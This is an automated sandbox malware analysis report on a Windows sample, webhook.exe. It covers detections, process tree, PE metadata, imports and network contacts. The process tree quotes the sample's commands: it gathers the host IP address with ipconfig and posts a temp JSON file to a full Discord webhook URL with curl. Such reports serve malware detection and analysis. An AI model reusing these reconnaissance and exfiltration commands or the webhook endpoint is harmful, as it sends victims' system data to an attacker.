Windows
Analysis Report
webhook.exe
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- webhook.exe (PID: 6476 cmdline:
"C:\Users\ user\Deskt op\webhook .exe" MD5: 5765BDE6D3062B30890598996B671DB0) - cmd.exe (PID: 6764 cmdline:
cmd /c "we bhook.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2336 cmdline:
C:\Windows \system32\ cmd.exe /c ipconfig | findstr /i "IPv4" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - ipconfig.exe (PID: 1928 cmdline:
ipconfig MD5: 62F170FB07FDBB79CEB7147101406EB8) - findstr.exe (PID: 2044 cmdline:
findstr /i "IPv4" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - curl.exe (PID: 3340 cmdline:
curl -H "C ontent-Typ e: applica tion/json" -d @"C:\U sers\user\ AppData\Lo cal\Temp\d iscord_web hook.json" "https:// discord.co m/api/webh ooks/12859 8062998880 2621/qvdwM _2Etcrhfd3 BeE7em_7Ki 8g5TtL1Xpo COOldpWtkd EpZOLeERx2 WW4gv8kmAB PXQ" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cleanup
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Code function: | 0_2_00007FF6505446E8 |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00007FF6505426B8 |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
Source: | Code function: | 0_2_00007FF650547FE4 | |
Source: | Code function: | 0_2_00007FF6505433BC |
Source: | Code function: | 0_2_00007FF650545B50 | |
Source: | Code function: | 0_2_00007FF65054521C | |
Source: | Code function: | 0_2_00007FF65054721C | |
Source: | Code function: | 0_2_00007FF650541A08 | |
Source: | Code function: | 0_2_00007FF650545810 | |
Source: | Code function: | 0_2_00007FF650544BE0 | |
Source: | Code function: | 0_2_00007FF6505478AE | |
Source: | Code function: | 0_2_00007FF650544BDE | |
Source: | Code function: | 0_2_00007FF6505433BC |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: | 0_2_00007FF650545B50 |
Source: | Code function: | 0_2_00007FF6505433BC |
Source: | Code function: | 0_2_00007FF650545B50 |
Source: | Code function: | 0_2_00007FF650545140 |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | 0_2_00007FF650541A08 |
Persistence and Installation Behavior |
---|
Source: | Process created: |
Source: | Code function: | 0_2_00007FF650541D28 |
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior | ||
Source: | Registry value created or modified: | Jump to behavior |
Source: | Process information set: | Jump to behavior |
Source: | Check user administrative privileges: | graph_0-2516 |
Source: | Last function: |
Source: | Code function: | 0_2_00007FF6505426B8 |
Source: | Code function: | 0_2_00007FF6505441EC |
Source: | Binary or memory string: |
Source: | Code function: | 0_2_00007FF650541A08 |
Source: | Code function: | 0_2_00007FF650541404 | |
Source: | Code function: | 0_2_00007FF65054170E |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_00007FF650542590 |
Source: | Code function: | 0_2_00007FF6505418E4 |
Source: | Code function: | 0_2_00007FF650547FE4 |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 2 Native API | 1 Scripting | 1 Access Token Manipulation | 1 Access Token Manipulation | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 1 Timestomp | Security Account Manager | 1 System Network Configuration Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 DLL Side-Loading | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 5 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
11% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
discord.com | 162.159.138.232 | true | false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1575685 |
Start date and time: | 2024-12-16 08:29:07 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | webhook.exe |
Detection: | MAL |
Classification: | mal52.winEXE@12/2@1/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Not all processes where analyzed, report is missing behavior information
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
162.159.138.232 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Babadeda, Blank Grabber | Browse | |||
Get hash | malicious | Python Stealer, Discord Token Stealer | Browse | |||
Get hash | malicious | Python Stealer | Browse | |||
Get hash | malicious | CStealer | Browse | |||
Get hash | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber | Browse | |||
Get hash | malicious | Luna Stealer | Browse | |||
Get hash | malicious | Growtopia | Browse | |||
Get hash | malicious | Python Stealer, Exela Stealer | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
discord.com | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Njrat | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Blank Grabber | Browse |
| ||
Get hash | malicious | Python Stealer, Muck Stealer | Browse |
| ||
Get hash | malicious | Python Stealer, Muck Stealer | Browse |
| ||
Get hash | malicious | Blank Grabber | Browse |
| ||
Get hash | malicious | Blank Grabber | Browse |
| ||
Get hash | malicious | Blank Grabber | Browse |
| ||
Get hash | malicious | Blank Grabber, Umbral Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Cobalt Strike, Remcos | Browse |
| |
Get hash | malicious | Cobalt Strike, Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
74954a0c86284d0d6e1c4efefe92b521 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Amadey, LummaC Stealer, Vidar | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Process: | C:\Users\user\Desktop\webhook.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1040 |
Entropy (8bit): | 5.237069171825323 |
Encrypted: | false |
SSDEEP: | 24:wEzHn8moNE/ipwBpy7Li1Yro5nyeGxq2GNC/HKlP:NH8moqaGbyni1YMgHq2cCPe |
MD5: | 55FDC03CE6D4C46489CA4DB903729D1C |
SHA1: | 97D9343B85C6310C975D9825DB1C7D905E5EBBA3 |
SHA-256: | D792224465EA5564F3698F05936E60A24551F51251FE4DD820919639F4586990 |
SHA-512: | 807E52DF55A1654E4B7E33BEC557887B6C471437574E196267699AB6908808E6DCB78016B3C0B5D97E7730E0D6C56BFA3BB39BC82FE06BB2D50E1D81D3023D58 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 63 |
Entropy (8bit): | 4.576663559094717 |
Encrypted: | false |
SSDEEP: | 3:3FFmKLmd1zEGEY+3QwoFXWJbRFhAyn:3FFmQiNvEJQHwbdAyn |
MD5: | 6E9B1CEC9721356D33D5D7D329891F50 |
SHA1: | 20A5C056A34AEBB3D6D88299B469C382CFED3C95 |
SHA-256: | 9612EB75E415D5518E468B8CD764EE41CF318C140FB27007E2E5815E6E57E160 |
SHA-512: | 0579FB4FF7FFA32FFC533507592A7BE7ABD1D432B592688ACD41F84DB160858AC8EF43F7CC1BFAA30F00B8E16F9EB9E5F367E32B0EC98765058C0E27CFBC2218 |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.30405433517673 |
TrID: |
|
File name: | webhook.exe |
File size: | 188'416 bytes |
MD5: | 5765bde6d3062b30890598996b671db0 |
SHA1: | 5b36dcecd5e3ba131fc05973179bffbbec08291d |
SHA256: | ebc2dba491422a0c420cc22ffe91483fe4885ecfae57baa2ed207252d9afd5de |
SHA512: | b7522888759ab43921328457c213d77338abc28cb967c645c82f26295dbc498937bb2c52dd7bb9252693ab3b26e221d26ac516acd2e4eb6fee5bf7f9bb7e839f |
SSDEEP: | 3072:7MobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk+5fJ3qa1lE+o:IeR7eamm+p0yN90QE9 |
TLSH: | 31047B0A27E62066F0B25B7099F202C34A79BCA37BB592BF5784817D0E336C49571F72 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._............." |
Icon Hash: | 3b6120282c4c5a1f |
Entrypoint: | 0x140001150 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE |
Time Stamp: | 0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 10 |
OS Version Minor: | 0 |
File Version Major: | 10 |
File Version Minor: | 0 |
Subsystem Version Major: | 10 |
Subsystem Version Minor: | 0 |
Import Hash: | 4cea7ae85c87ddc7295d39ff9cda31d1 |
Instruction |
---|
dec eax |
sub esp, 28h |
call 00007F0761094FD0h |
dec eax |
add esp, 28h |
jmp 00007F076109484Bh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
dec eax |
mov dword ptr [esp+08h], ebx |
dec eax |
mov dword ptr [esp+10h], edi |
inc ecx |
push esi |
dec eax |
sub esp, 000000B0h |
and dword ptr [esp+20h], 00000000h |
dec eax |
lea ecx, dword ptr [esp+40h] |
call dword ptr [000082A5h] |
nop |
dec eax |
mov eax, dword ptr [00000030h] |
dec eax |
mov ebx, dword ptr [eax+08h] |
xor edi, edi |
xor eax, eax |
dec eax |
cmpxchg dword ptr [0000B9D2h], ebx |
je 00007F076109484Ch |
dec eax |
cmp eax, ebx |
jne 00007F076109485Fh |
mov edi, 00000001h |
mov eax, dword ptr [0000B9C8h] |
cmp eax, 01h |
jne 00007F076109485Ch |
lea ecx, dword ptr [eax+1Eh] |
call 00007F0761094E64h |
jmp 00007F07610948C9h |
mov ecx, 000003E8h |
call dword ptr [00008253h] |
jmp 00007F0761094806h |
mov eax, dword ptr [0000B9A3h] |
test eax, eax |
jne 00007F07610948A5h |
mov dword ptr [0000B995h], 00000001h |
dec esp |
lea esi, dword ptr [000084DEh] |
dec eax |
lea ebx, dword ptr [000084BFh] |
dec eax |
mov dword ptr [esp+30h], ebx |
mov dword ptr [esp+24h], eax |
dec ecx |
cmp ebx, esi |
jnc 00007F0761094871h |
test eax, eax |
jne 00007F0761094871h |
dec eax |
cmp dword ptr [ebx], 00000000h |
je 00007F076109485Ch |
dec ecx |
mov edx, 5E523070h |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa394 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1e0d4 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x444 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0x30 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a78 | 0x54 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x140 | .rdata |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9150 | 0x520 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x7eb0 | 0x8000 | 8f5ddc5fa0c3119d30f7e00d7bfd48aa | False | 0.547576904296875 | data | 6.109997796878264 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x9000 | 0x2420 | 0x3000 | 79a5acf192c71ab3579d24a79e81e45b | False | 0.3240559895833333 | data | 3.9065058401206216 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xc000 | 0x1f00 | 0x1000 | f198899505f620007167379f74f8141c | False | 0.083251953125 | data | 1.0384025678015962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0xe000 | 0x444 | 0x1000 | d87d18cc3448a50b581d9a9660a39914 | False | 0.164306640625 | PEX Binary Archive | 1.4622023798757706 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0xf000 | 0x1f000 | 0x1f000 | bbe705de4a7a23fcb6d7820b74eeda77 | False | 0.6625346522177419 | data | 6.821649689100556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x2e000 | 0x30 | 0x1000 | b86e33c1f7fc5de5ef683b7d6eea5c32 | False | 0.01806640625 | data | 0.11282277483477143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
AVI | 0xfb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States | 0.2713099474665311 |
RT_ICON | 0x1294c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3225609756097561 |
RT_ICON | 0x12fb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.41263440860215056 |
RT_ICON | 0x1329c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.4569672131147541 |
RT_ICON | 0x13484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5574324324324325 |
RT_ICON | 0x135ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.6223347547974414 |
RT_ICON | 0x14454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.7369133574007221 |
RT_ICON | 0x14cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.783410138248848 |
RT_ICON | 0x153c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3829479768786127 |
RT_ICON | 0x1592c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004662673505254 |
RT_ICON | 0x23300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5300829875518672 |
RT_ICON | 0x258a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6137429643527205 |
RT_ICON | 0x26950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.703688524590164 |
RT_ICON | 0x272d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.425531914893617 |
RT_DIALOG | 0x27740 | 0x2f2 | data | English | United States | 0.4389920424403183 |
RT_DIALOG | 0x27a34 | 0x30c | data | Swedish | Sweden | 0.4371794871794872 |
RT_DIALOG | 0x27d40 | 0x1b0 | data | English | United States | 0.5625 |
RT_DIALOG | 0x27ef0 | 0x1b0 | data | Swedish | Sweden | 0.5578703703703703 |
RT_DIALOG | 0x280a0 | 0x166 | data | English | United States | 0.5223463687150838 |
RT_DIALOG | 0x28208 | 0x148 | data | Swedish | Sweden | 0.5274390243902439 |
RT_DIALOG | 0x28350 | 0x1c0 | data | English | United States | 0.5446428571428571 |
RT_DIALOG | 0x28510 | 0x1b0 | data | Swedish | Sweden | 0.5532407407407407 |
RT_DIALOG | 0x286c0 | 0x130 | data | English | United States | 0.5526315789473685 |
RT_DIALOG | 0x287f0 | 0x11e | data | Swedish | Sweden | 0.541958041958042 |
RT_DIALOG | 0x28910 | 0x120 | data | English | United States | 0.5763888888888888 |
RT_DIALOG | 0x28a30 | 0x118 | data | Swedish | Sweden | 0.5857142857142857 |
RT_STRING | 0x28b48 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States | 0.6214285714285714 |
RT_STRING | 0x28bd4 | 0x8c | Matlab v4 mat-file (little endian) \344, numeric, rows 0, columns 0 | Swedish | Sweden | 0.6285714285714286 |
RT_STRING | 0x28c60 | 0x520 | data | English | United States | 0.4032012195121951 |
RT_STRING | 0x29180 | 0x59c | data | Swedish | Sweden | 0.3544568245125348 |
RT_STRING | 0x2971c | 0x5cc | data | English | United States | 0.36455525606469 |
RT_STRING | 0x29ce8 | 0x672 | data | Swedish | Sweden | 0.34424242424242424 |
RT_STRING | 0x2a35c | 0x4b0 | data | English | United States | 0.385 |
RT_STRING | 0x2a80c | 0x506 | data | Swedish | Sweden | 0.36702954898911355 |
RT_STRING | 0x2ad14 | 0x44a | data | English | United States | 0.3970856102003643 |
RT_STRING | 0x2b160 | 0x43c | data | Swedish | Sweden | 0.4188191881918819 |
RT_STRING | 0x2b59c | 0x3ce | data | English | United States | 0.36858316221765913 |
RT_STRING | 0x2b96c | 0x332 | data | Swedish | Sweden | 0.38264058679706603 |
RT_RCDATA | 0x2bca0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143 |
RT_RCDATA | 0x2bca8 | 0x2da | Microsoft Cabinet archive data, Windows 2000/XP setup, 730 bytes, 1 file, at 0x2c +A "webhook.bat", ID 1108, number 1, 1 datablock, 0x1503 compression | Swedish | Sweden | 1.015068493150685 |
RT_RCDATA | 0x2bf84 | 0x4 | data | Swedish | Sweden | 3.0 |
RT_RCDATA | 0x2bf88 | 0x24 | data | Swedish | Sweden | 0.8055555555555556 |
RT_RCDATA | 0x2bfac | 0x7 | ASCII text, with no line terminators | Swedish | Sweden | 2.142857142857143 |
RT_RCDATA | 0x2bfb4 | 0x7 | ASCII text, with no line terminators | Swedish | Sweden | 2.142857142857143 |
RT_RCDATA | 0x2bfbc | 0x4 | data | Swedish | Sweden | 3.0 |
RT_RCDATA | 0x2bfc0 | 0x7 | ASCII text, with no line terminators | English | United States | 2.142857142857143 |
RT_RCDATA | 0x2bfc8 | 0x4 | data | Swedish | Sweden | 3.0 |
RT_RCDATA | 0x2bfcc | 0x15 | ASCII text, with no line terminators | English | United States | 1.380952380952381 |
RT_RCDATA | 0x2bfe4 | 0x4 | data | Swedish | Sweden | 3.0 |
RT_RCDATA | 0x2bfe8 | 0x2 | data | Swedish | Sweden | 5.0 |
RT_RCDATA | 0x2bfec | 0x7 | ASCII text, with no line terminators | Swedish | Sweden | 2.142857142857143 |
RT_RCDATA | 0x2bff4 | 0x13 | ASCII text, with no line terminators | English | United States | 1.4210526315789473 |
RT_GROUP_ICON | 0x2c008 | 0xbc | data | English | United States | 0.6117021276595744 |
RT_VERSION | 0x2c0c4 | 0x408 | data | English | United States | 0.42054263565891475 |
RT_VERSION | 0x2c4cc | 0x420 | data | Swedish | Sweden | 0.4384469696969697 |
RT_MANIFEST | 0x2c8ec | 0x7e6 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.37734915924826906 |
DLL | Import |
---|---|
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges |
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose |
GDI32.dll | GetDeviceCaps |
USER32.dll | ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA |
msvcrt.dll | ?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy |
COMCTL32.dll | |
Cabinet.dll | |
VERSION.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States | |
Swedish | Sweden |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 16, 2024 08:30:10.588248014 CET | 49734 | 443 | 192.168.2.4 | 162.159.138.232 |
Dec 16, 2024 08:30:10.588305950 CET | 443 | 49734 | 162.159.138.232 | 192.168.2.4 |
